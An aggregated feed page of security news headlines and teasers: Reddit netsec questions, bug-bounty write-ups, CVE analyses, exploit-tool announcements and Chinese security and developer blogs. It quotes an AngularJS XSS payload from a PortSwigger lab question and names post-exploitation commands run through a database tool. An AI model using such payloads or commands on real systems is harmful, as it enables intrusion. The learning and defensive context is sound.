    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
  • Open

    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...

  • Open

    Fun ideas for physical pentesting?
    Hey team! So my sec team started a physical security assessment a week ago and its been fun. I got to use the under-the-door tool, tailgate, clone rfid card and bypass motion sensor entrances/exits. I was wondering if you guys had any ideas about what you would do if you had “keys to the kingdom” such as the server room or someones desktop? Edit: grammar submitted by /u/Enes_24 [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Automating a Red Team lab with Packer, Terraform and Ansible
    submitted by /u/nickonos [link] [comments]
    Reading and Writing into Process's Memory
    Get the basic understanding on the remote process memory read and write all by windows 32 API and create your own game hacks. https://tbhaxor.com/reading-and-writing-into-processs-memory/ submitted by /u/tbhaxor [link] [comments]
  • Open

    Comprehensive collection of Bionicle Lego images
    submitted by /u/limb_fed [link] [comments]
    Electronic music and Drum 'n' Bass samples
    http://doa.totallyowns.co.uk/ submitted by /u/CalmWater8439 [link] [comments]
    13 Years of Weird Adult Forum Stuff - Organized by YYMM
    submitted by /u/Rose_Beef [link] [comments]
  • Open

    Command line execution fuzzer and bruteforcer (Equivalent of wfuzz for all command line)
    submitted by /u/cryptaureau [link] [comments]
    Wrote a new blog post on injecting fake credentials into lsass memory using New-HoneyHash and alerting with Elastic.
    submitted by /u/m_edmondson [link] [comments]
    My first vulnerability - Arista gNMI authentication bypass CVE-2021-28500
    submitted by /u/MilesTails [link] [comments]
    Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql
    submitted by /u/toyojuni [link] [comments]
    Find You: Building a stealth AirTag clone
    submitted by /u/breakingsystems [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Plone Scanner Version 0.01
    submitted by /u/halencarjunior [link] [comments]
    nrich: a new tool to quickly find open ports and vulnerabilities via Shodan
    submitted by /u/0xdea [link] [comments]
    Linux kernel NFC Use-After-Free (CVE-2021-23134) PoC
    submitted by /u/awarau888 [link] [comments]
  • Open

    Healing blind injections
    What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones? Continue reading on Medium »
    eCPTX Exam Review by 0xJin
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on Medium »
    What an injection into jQuery-selector can lead to
    ​I somehow came across a page with something like a user survey (the program is private, so I will speak abstractly). Continue reading on Medium »
    XSS in hidden input field
    Hello again! I’m faizan and today I’m writing about an XSS I found in an input field which was hidden from the page using Content division… Continue reading on Medium »
    Parameter Tampering
    First, What is the Parameter Tampering? Continue reading on Medium »
    How I found broken link hijack using Python
    Disclaimer Continue reading on Medium »
    How I could’ve bypassed the 2FA security of Instagram once again?
    … Continue reading on InfoSec Write-ups »
    Attacking Kerberos | Kerberoasting | AS-REP Roasting | Active Directory | Windows |
    This blog covers how to attack Kerberos with Kerberoasting and AS-REP Roasting attacks. Continue reading on System Weakness »
    Polygon Consensus Bypass Bugfix Review
    Summary Continue reading on Immunefi »
  • Open

    I was solving an XSS lab on portswigger when I came across this js payload could anyone please explain me how it works [ {{$on.constructor('alert(1)')()}} ]
    Here is the link to the lab : https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression submitted by /u/_JatinChopra_ [link] [comments]
    Are there any sites with clear information about specific CVEs and how they can be exploited?
    It seems a lot of these sites that I am finding are very vague about the different vulnerabilities. It would be helpful to find a place where I can search the CVE and they can tell me how it is vulnerable and how it can be exploited. submitted by /u/Ok-Oil2953 [link] [comments]
    How are you tracking and documenting SIEM use cases?
    Curious to see what solutions folks have for documenting and tracking SIEM use cases. Are you just throwing everything into a spreadsheet? Using a KB tool like Confluence? Do you have a formalized process for handling changes to rules or retiring them? submitted by /u/wowneatlookatthat [link] [comments]
    SSH: Which server gets which keys to work?
    Sorry if this is a bit of a basic question but I’m setting up my first headless server and could use your advice. I have a server which I’d like to access via SSH. I have created a password protected key file to do so. I will be accessing the server from a few different clients, all belonging to me and no-one else. Is it correct to only have the public key on the server, and to have both the private and public keys on the clients? Or does the server need the private key? Is it even possible for the client to work without both the public and private keys available to it…? submitted by /u/JamieOvechkin [link] [comments]
    Common security-centric query languages?
    I'm working on a personal project relating to security-centric query languages, and I'm trying to get an overview of current (popular) languages. So far, I've got: Splunk Search Processing Language Falcon Query Language Microsoft Kusto Rapid7 Log Entry Query Language Are there other major languages in use currently? submitted by /u/QuirkySpiceBush [link] [comments]
    Receiving OTPs and verification links for different websites from the same number
    Hi all, I recently noticed that i am getting the OTPs/reset links for different websites (such as Instagram and Amazon) from the same number. That is the password reset link for instagram was sent to my phone from the same number as the verification link for amazon. The number is something like 78549659. Is this normal or does each company have a different number for sending such texts? submitted by /u/Euphoric_Asparagus90 [link] [comments]
    SANS SEC522 vs SEC542
    Hey everyone. My employer is paying for me to do a SANS certificate of my choosing, I'm interested in the web/appsec based certs. I was wondering if anyone's taken either of these or would recommend one over the other. Thanks submitted by /u/n3v327311 [link] [comments]
  • Open

    How dangerous is being a digital forensic investigator?
    I am currently doing BSc in Information systems and want to do masters in digital/computer forensics. submitted by /u/SkillKiller3010 [link] [comments]
    Why do some investigations take longer and some shorter?
    I often read in news articles that some suspects have been arrested for internet crimes that take “months long investigation”. Why does it take months long if they already have so called evidence especially if they have received tips on it from organizations such as NCMEC submitted by /u/Ill-Date-1852 [link] [comments]
    Fargate incident response
    How do we isolate affected containers for AWS ECS/EKS in fargate? Creating a new security group for ECS will result in new tasks being recreated to replace the old tasks, so the affected tasks won't be preserved. In EKS, there is no visibility into the security groups of the node. The only way to isolate is through the ACL which is not very ideal as there may be other apps using the same ACL. submitted by /u/SnooKiwis8248 [link] [comments]
    For research - breaking into Computer/Digital Forensics?
    Hey all - hope you're doing well. Doing some research on the Computer/Digital forensics field for a friend - I've looked a bit across Google, postings on job sites, etc. but wanted to get some knowledge from this pretty extensive community! How would someone with an M.A. (Masters) break into Computer or Digital forensics? Is a certification or class worth it (i.e. classes on Udemy, Coursera for specializations, or a university/online bootcamp program on digital or computer based forensics) What is your day-to-day like, how did you get into the field/how do you like it? What are common tools and skills - how much of a technical or IT background is required? Thank you! submitted by /u/sora1493 [link] [comments]
  • Open

    An Accidental SSRF Honeypot in Google Calendar
    This is a story of what both I and Google engineers considered to be an SSRF vulnerability in Google Calendar — but turned out to be some… Continue reading on Medium »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on ITNEXT »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on Medium »
  • Open

    SecWiki News 2022-02-21 Review
    SecWiki周刊(第416期) by ourren 漏洞可用性交流(VEX)介绍 by ourren PAM 2022 论文录用列表 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-02-21 Review
    SecWiki周刊(第416期) by ourren 漏洞可用性交流(VEX)介绍 by ourren PAM 2022 论文录用列表 by ourren 更多最新文章,请访问SecWiki
  • Open

    OWASP-LPU CTF: OSINT
    Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 14
    And here we go to Hacktoria’s geolocation number 14 challenge! They keep on coming and I keep on solving them. So without further ado… Continue reading on Medium »
    Never Forget The Moon — OSINT Challenge 18
    On Dec 28, 2021, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »
    Capture The Talent — OSINT Write-ups
    Du samedi 19 au dimanche 20 février 2022, s’est déroulé le CTF de Capture The Talent. 🏆Classement final: 1/52 Continue reading on Medium »
  • Open

    De-anonymize anonymous tips through the Tumblr blog network
    Automattic disclosed a bug submitted by ajoekerr: https://hackerone.com/reports/1484168 - Bounty: $450
    Remote memory disclosure vulnerability in libcurl on 64 Bit Windows
    curl disclosed a bug submitted by nsq11: https://hackerone.com/reports/1444539
    Page has a link to google drive which has logos and a few customer phone recordings
    Zomato disclosed a bug submitted by codersanjay: https://hackerone.com/reports/864712 - Bounty: $200
  • Open

    AntiFuzz: Impeding Fuzzing Audits of Binary Executables
    Article URL: https://neverworkintheory.org/2022/02/21/antifuzz.html Comments URL: https://news.ycombinator.com/item?id=30414501 Points: 9 # Comments: 1
  • Open

    FreeBuf早报 | 豆瓣被爆APP内截图含个人敏感信息;攻击者通过NFT话题分发木马
    豆瓣网被爆出在页面中使用难以察觉的隐形水印,水印的信息包括用户 UID、TID 及带时区的完整时间。
    华云安·ASM技术篇:应对零日攻击的检测模型(VEAM)
    2021年至少发现66个仍在使用中的零日漏洞,数量约是2020年的两倍。
    英国Monzo数字银行用户正受网络钓鱼威胁
    英国数字银行平台Monzo正成为钓鱼攻击的目标,用户收到了含有钓鱼链接的短信。
    价值数百万美元的NFT在攻击中被盗、谷歌向全球32亿用户发出紧急警告|2月21日全球网络安全热点
    2月21日全球网络安全热点。
    最新报告|深信服2021勒索病毒态势报告
    最新报告出炉!
    白宫将乌克兰DDoS攻击锁定在俄罗斯GRU黑客身上
    近期乌克兰发生的DDoS攻击,被指是俄罗斯主导的黑客攻击。
  • Open

    Linux Kernel Use-After-Free (CVE-2021-23134) PoC
    Article URL: https://ruia-ruia.github.io/NFC-UAF/ Comments URL: https://news.ycombinator.com/item?id=30413955 Points: 1 # Comments: 0
  • Open

    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
  • Open

    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    使用动态时间规整 (DTW) 解决时间序列相似性度量及河流上下游污染浓度相似性识别分析 - 鸣梦
    时间序列相似性度量方法 时间序列相似性度量常用方法为欧氏距离ED(Euclidean distance)和动态时间规整DTW(Dynamic Time Warping)。总体被分为两类: 锁步度量(lock-step measures) 和弹性度量(elastic measures) 。锁步度量是时  ( 1 min )
    在线pdf请你谨慎打开 - 踩刀诗人
    本篇其实算之前安全整改话题的一点补充,对之前内容感兴趣的可以走以下快捷通道: 安全漏洞整改系列(二) 安全漏洞整改系列(一) 背景 前不久某家客户对我们提供的系统又进行了一轮安全测试,其中有一条我觉得很有意思,也算是刷新了我的认知,那就是“pdf预览存在xss注入”,在此跟大家分享一波,也算是相互提
    CTO(技术总监)平时都在做些什么? - 程序员守护石
    ​目前创业,最后一家公司任职医疗科技公司的研发中心总经理,之前也在几家公司的任职研发/技术总监岗位,在我理解的范围,目前国内中小企业对于CTO/技术总监的岗位区别没有那么明确的职能区分。 1. 先总结 我先概要性总结一下CTO/技术总监的作用: ❶ CTO/技术总监应具有企业技术方向的整体把控力,也
    看SparkSql如何支撑企业数仓 - 字节跳动数据平台
    企业级数仓架构设计与选型的时候需要从开发的便利性、生态、解耦程度、性能、 安全这几个纬度思考。本文作者:惊帆 来自于数据平台 EMR 团队 前言 Apache Hive 经过多年的发展,目前基本已经成了业界构建超大规模数据仓库的事实标准和数据处理工具,Hive 已经不单单是一个技术组件,而是一种设计  ( 4 min )
    微信一面:什么是一致性哈希?用在什么场景?解决了什么问题? - 小林coding
    大家好,我是小林。 在逛牛客网的面经的时候,发现有位同学在面微信的时候,被问到这个问题: 第一个问题就是:一致性哈希是什么,使用场景,解决了什么问题? 这个问题还挺有意思的,所以今天就来聊聊这个。 发车! 如何分配请求? 大多数网站背后肯定不是只有一台服务器提供服务,因为单机的并发量和数据量都是有限  ( 1 min )
    如何在 Flutter 中集成华为云函数服务 - 华为开发者论坛
    介绍 云函数是一项 Serverless 计算服务,提供 FaaS(Function as a Service)能力,可以帮助开发者大幅简化应用开发与运维相关事务,降低应用功能的实现门槛,快速构建业务能力。下面将介绍如何在 Flutter 框架下集成云函数。 集成步骤 1. 安装 flutter 环  ( 1 min )
    JVM基础学习(二):内存分配策略与垃圾收集技术 - Huangzzzzz
    Java与C++之间有一堵由内存动态分配和垃圾收集技术所围成的高墙,墙外面的人想进去,墙里面的人却想出来 垃圾收集概述 Java内存模型中的堆和方法区是垃圾收集技术所需要关注的终点,因为其他的区域会跟随线程的结束而自动回收。 而需要解决垃圾收集的首要目标便是解决如何判断一个对象已经不需要了从而自动进
    【曹工杂谈】Mysql-Connector-Java时区问题的一点理解--写入数据库的时间总是晚13小时问题 - 三国梦回
    背景 去年写了一篇“【曹工杂谈】Mysql客户端上,时间为啥和本地差了整整13个小时,就离谱 ”,结果最近还真就用上了。 不是我用上,是组内一位同事,他也是这样:有个服务往数据库insert记录,记录里有时间,比如时间A。然后写进数据库后,数据库里的时间是A-13,晚了13小时。然后就改了这么个地方  ( 1 min )
    『无为则无心』Python基础 — 44、对文件和文件夹的操作 - 繁华似锦Fighting
    1、os模块介绍 os模块提供了多数操作系统的功能接口函数。当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作。 在Python编程时,os模块可以处理文件和目录这些我们日常手动需要做的操作,例如:显示当前目录下所有文件、删除某个文件、获取文件大小等等。 在Python  ( 1 min )
    疑难杂症:运用 transform 导致文本模糊的现象探究 - ChokCoco
    在我们的页面中,经常会出现这样的问题,一块区域内的文本或者边框,在展示的时候,变得特别的模糊,如下(数据经过脱敏处理): 正常而言,应该是这样的: emmm,可能大图不是很明显,我们取一细节对比,就非常直观了: 何时触发这种现象? 那么?什么时候会触发这种问题呢?在 Google 上,其实我们能搜到  ( 1 min )
    LibOpenCM3(一) Linux下命令行开发环境配置 - Milton
    LibOpenCM3 是GPL协议(LGPL3)的Cortex-M系列的固件库, 支持stm32、atmel、nxp系列单片机. 这个固件库对标的是 CMSIS, 但是比 CMSIS 提供更多的方法接口, 实现度介于 CMSIS 和 SPL 之间. 对于常见的 STM32F1 系列, 代码已经基本稳...  ( 3 min )
    VS Code开发TypeScript - 寻找无名的特质
    本文概要介绍使用VS Code开发TypeScript的过程。  ( 1 min )
    Spring中的Environment外部化配置管理详解 - 跟着Mic学架构
    Environment的中文意思是环境,它表示整个spring应用运行时的环境信息,它包含两个关键因素 profiles properties profiles profiles这个概念相信大家都已经理解了,最常见的就是不同环境下,决定当前spring容器中的不同配置上下文的解决方案。比如针对开发环  ( 1 min )
    从零开始, 开发一个 Web Office 套件(4):新的问题—— z-index - 赵康
    《从零开始, 开发一个 Web Office 套件》系列博客目录 这是一个系列博客, 最终目的是要做一个基于HTML Canvas 的, 类似于微软 Office 的 Web Office 套件, 包括: 文档, 表格, 幻灯片... 等等. 对应的Github repo 地址: https://g  ( 1 min )
    vivo 服务端监控架构设计与实践 - vivo互联网技术
    一、业务背景 当今时代处在信息大爆发的时代,信息借助互联网的潮流在全球自由的流动,产生了各式各样的平台系统和软件系统,越来越多的业务也会导致系统的复杂性。 当核心业务出现了问题影响用户体验,开发人员没有及时发现,发现问题时已经为时已晚,又或者当服务器的CPU持续增高,磁盘空间被打满等,需要运维人员及  ( 1 min )
    通过Dapr实现一个简单的基于.net的微服务电商系统(十九)——分布式事务之Saga模式 - a1010
    在之前的系列文章中聊过分布式事务的一种实现方案,即通过在集群中暴露actor服务来实现分布式事务的本地原子化。但是actor服务本身有其特殊性,场景上并不通用。所以今天来讲讲分布式事务实现方案之saga模式,并在文后附上代码供各位读者参考,评论。 目录:一、通过Dapr实现一个简单的基于.net的微  ( 1 min )
    上周热点回顾(2.14-2.20) - 博客园团队
    热点随笔: · 2021年度总结 | 葡萄城软件开发技术回顾(下) (葡萄城技术团队)· 从MVC到DDD的架构演进 (木小丰)· 3.6 万颗星!开源 Web 服务器后起之秀,自带免费 HTTPS 开箱即用 (削微寒)· ASP.NET Core 6框架揭秘实例演示[01]: 编程初体验 (Art
    私有化轻量级持续集成部署方案--04-私有代码仓库服务-Gitea - 莫问今朝乄
    提示:本系列笔记全部存在于 Github, 可以直接在 Github 查看全部笔记 企业级最流行的私有代码仓库是 Gitlab, 一开始我也打算部署 Gitlab作为私有代码仓库。 但部署完成后发现, Gitlab 资源占用太大了。优化之后也要占用 3g 内存,最后只好放弃这一方案。 随后发现了 G  ( 2 min )
    微服务从代码到k8s部署应有尽有系列(四、用户中心) - 万俊峰Kevin
    我们用一个系列来讲解从需求到上线、从代码到k8s部署、从日志到监控等各个方面的微服务完整实践,整个项目使用了go-zero开发,基本包含了go-zero以及go-zero作者开发的一些中间件,所用到的技术栈基本是go-zero的自研组件。  ( 1 min )
    四探循环依赖 → 当循环依赖遇上 BeanPostProcessor,爱情可能就产生了! - 青石路
    开心一刻 那天知道她结婚了,我整整一个晚上没睡觉,开了三百公里的车来到她家楼下,缓缓的抽了一支烟...... 天渐渐凉了,响起了鞭炮声,迎亲车队到了,那天披着婚纱的她很美,真的很美! 我跟着迎亲车队开了几公里的时候,收到了她的信息:别送了,别送了,你的手扶拖拉机太响了 ...... 前情回顾 楼主一  ( 1 min )
  • Open

    How To Integrate or Query My Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed In Your Firewall or Security Solution - An Analysis
    Dear blog readers, Did you already pull my public and free STIX STIX2 TAXII threat intelligence feed using your and your organization's Lifetime API Key? In this post I've decided to elaborate more and offer practical advice and links in terms of how you can pull and integrate my daily updated STIX STIX2 TAXII threat intelligence feed in your firewall or security solution and how you can actually use your Lifetime API Key for my feed in Maltego for possible enrichment of your IoCs (Indicators of Compromise). Here's your Lifetime API Key for you and your organization - f8aa0cca-a0ac-4eff-9c03-1c86ad7aee93 Portal: https://ddanchev.ngrok.io API: https://ddanchev.ngrok.io/graphql API Documentation: https://luatix.notion.site/GraphQL-API-cfe267386c66492eb73924ef059d6d59 API Client: https://opencti-client-for-python.readthedocs.io/en/3.3.0/pycti/pycti.html API requirements: https://github.com/amr-cossi/opencti-maltego/blob/master/config.py.sample TAXII Collection: https://ddanchev.ngrok.io/taxii2/root/collections/c2259b20-9c60-4ddd-8931-8de970440f06/objects Bearer Token Authentication Required: https://github.com/OpenCTI-Platform/opencti/issues/1198 Maltego transforms available: - https://www.maltego.com/downloads/ - https://www.maltego.com/transform-hub/opencti/ - https://www.maltego.com/transform-hub/stix/ As always feel free to drop me a line at dancho.danchev@hush.com in case you have any questions. Full list of solutions compatible with STIX STIX2 and TAXII EventLog Analyzer ThreatConnect Azure Sentinel Splunk Cisco Elemendar Cortex XSOAR TrendMicro ArcSight Microsoft Sentinel EventTracker Plixer Scrutinizer Sumo Logic Kaspersky CyberTrace ServiceNow CheckPoint ThreatCloud Carbon Black EDR Cisco Email Gateway ThreatConnect LogPoint Tanium Symantec LogRhythm Infoblox Cloudera Sample screenshots of my STIX STIX2 TAXII Threat Intelligence feed in combination with Maltego: Enjoy!

  • Open

    Inventing Anna, engenharia social e OSINT, qual o prospecto para o futuro no quesito de segurança…
    O quanto de informação pessoal e íntima divulgamos nas mídias sociais de forma espontânea e despreocupada? Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 13
    Thirteen. Unlucky for some. Let’s see how you could solve Hacktoria’s practice challenge: Geolocation 13. I confess I was very excited… Continue reading on Medium »  ( 3 min )
  • Open

    Analysis of CVE-2021-36260: Exploited in the Wild Hikvision Camera Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
    rconn - Consume services behind NAT or firewall without opening ports or port-forwarding
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    Running Cobalt Strike BOFs from Python
    submitted by /u/naksyn_ [link] [comments]
  • Open

    Interesting Stored XSS
    Hey there! My name is Faizan and this write up is about an interesting Stored XSS I found earlier today! If you know what an XSS aka Cross… Continue reading on Medium »  ( 1 min )
    Give me a browser, I’ll give you a shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »  ( 3 min )
    Burp Suite Tool — Overview and Usage
    Burp Suite is an intercepting tool which can be used to capture and manipulate all of the data traffic between Client and Server. This… Continue reading on Medium »  ( 2 min )
    Send a Email to me and get kicked out of Google Groups !!
    A Feature that almost broke Google Groups !! Continue reading on InfoSec Write-ups »  ( 3 min )
    How I make money with Hacking …
    Hello Everyone, This is Abhishek Kashniyal, I am a CSE student with specialization in Cyber Security & Forensics, a constant learner and… Continue reading on Medium »  ( 2 min )
    BugBounty: Algolia key disclosure vulnerability
    What is Algolia? Continue reading on Medium »  ( 1 min )
  • Open

    A bunch of rock music
    http://djbloom.info/Music/My%20Music/ submitted by /u/CalmWater8439 [link] [comments]  ( 1 min )
    I'm bad at coding. How do I create an Open Directory from scratch?
    Just what the title says. I have some music, movies, documents, etc that I'd like to share, but I don't want to take up or make an entire Google Drive account just for some files. Any help getting started would be greatly appreciated! submitted by /u/Reggie_Smith_89 [link] [comments]  ( 4 min )
  • Open

    I want to know what a day in a life looks like as a infosec analyst. also what would company’s look for when hiring a junior infosec analyst
    what would a company look for when hiring junior infosec analysts? i just started as a junior help desk technician and i hear that experience is better than certs i just want to get an idea of what a company will look for when hiring a junior infosec analyst also is it possible to go from help desk to infosec? submitted by /u/Jkarl0880 [link] [comments]  ( 1 min )
    Any suggestions for gaining resume-worthy experience in cloud security?
    I pivoted from a technical security role to a customer facing technical/management role for a cybersecurity SaaS company a couple years ago. I’ve been considering getting back into the security engineering/architect side of things. One area I’m finding seems to be a requirement for most roles is experience in cloud security like mastery of AWS. I’m also noticing requirements for experience in container tools such as Kubernetes. This isn’t experience I can gain on the job right now. Any suggestions on how I can get experience that matters for these technologies? I don’t want to fall behind and lose any chance of working in a direct security role again submitted by /u/7heJoker [link] [comments]  ( 1 min )
    SAP CVE-2022-22536 technical analysis?
    Anybody by some chance has some sources on the new CVE of score 10 impacting SAP NetWeaver? I can't find any details of the specific vulnerable mechanism that allowed the request smuggling. Thanks :) submitted by /u/Altiverses [link] [comments]  ( 1 min )
    What are the prerequisite skills/knowledge for reverse engineering?
    Trying to learn reverse-engineering and binary exploitation and I came across this playlist, Watched a few videos but didn't got a thing, it feels like I'm missing some knowledge gaps in between, Can someone please give me a clear roadmap so that I can start using Radare2? ​ Edit: after radare, I wanna learn Ghidra lol submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    How is your day as an entry-level SOC
    I have recently interviewed for an entry-level SOC role, and my expectation is a bit mixed. It is a cybersecurity company that provides services such as SIEM monitoring, pen-testing, threat hunting, etc. The X company has 5 people, including the CEO and CTO. And around 300 customers. The role is to sit with the SOC team, check alerts, and then give customers a summary each quarter of what happened within that period. The job title was listed as a cyber security engineer, and the job description mentioned Analysis of security incidents Incident Response Teams Threat Hunting Security advice During the interview, they asked me two times specifically how I felt about giving security advice to customers, is it normal that the junior SOC gives security advice to customers? Or is this a good way to get into the "cyber world", then apply for new jobs after 1 year? Going to graduate with my BS this summer, so trying to land a job before I graduate. submitted by /u/PapiPoseidon [link] [comments]  ( 1 min )
  • Open

    擅长捉弄的内存马同学:Servlet内存马
    Servlet内存马的最后一篇,直接从加载开始说起。  ( 1 min )
  • Open

    SecWiki News 2022-02-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Telegram vs Cellebrite
    "Telegram for iOS: Access and decode secret chats which can only be accessed on their devices of origin. You can also recover deleted messages." im in too deep this forensic thingy is kinda exciting and im in a business major. I guess one can really recover deleted telegram chats using cellebrite! amazing submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Apple iCloud Productions
    What kind of data are included in apple icloud productions ? do they include permanently deleted files notes, media? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    jump from IT Audit into computer forensics
    hello friends to make things short, I am an IT Auditor with 1.5 years of experience, and I hate the part of dealing with people in IT Audit. but its very essential to deal with people there. so decided to jump to forensics, do you people deal with humans or simply have to worry about machines and that is it? and, i am cisa certified, will that help? what certification do you suggest taking for computer forensics? and how is the pay for IT Audit vs Computer forensics? in short, do you recommend the shift or not? thx submitted by /u/ItchyPilot9804 [link] [comments]  ( 2 min )
  • Open

    [Cullinan #27] Improve cullinan and Added more..
    컬리넌 로그 #27입니다. 조금 오랜만에 올리게되는 것 같습니다. Add category cullinan Add OWASP ZAP Add Insecure Deserialization Change SQLMap (Add scanning to X) ZAP과 Insecure Deserialization이 새로 추가됬고, SQLMap 쪽에 일부 수정이 있었습니다. ZAP은 아마… 수정을 굉장히 자주하게 될 것 같습니다. 양이 워낙 방대해서리 😵‍💫 그리고 Cullinan 전체적으로 기능들을 좀 더 추가중인데, 첫 단추로 categories 적용이 완료되었습니다. 그럼 이만 👋🏼
    Insecure Deserialization
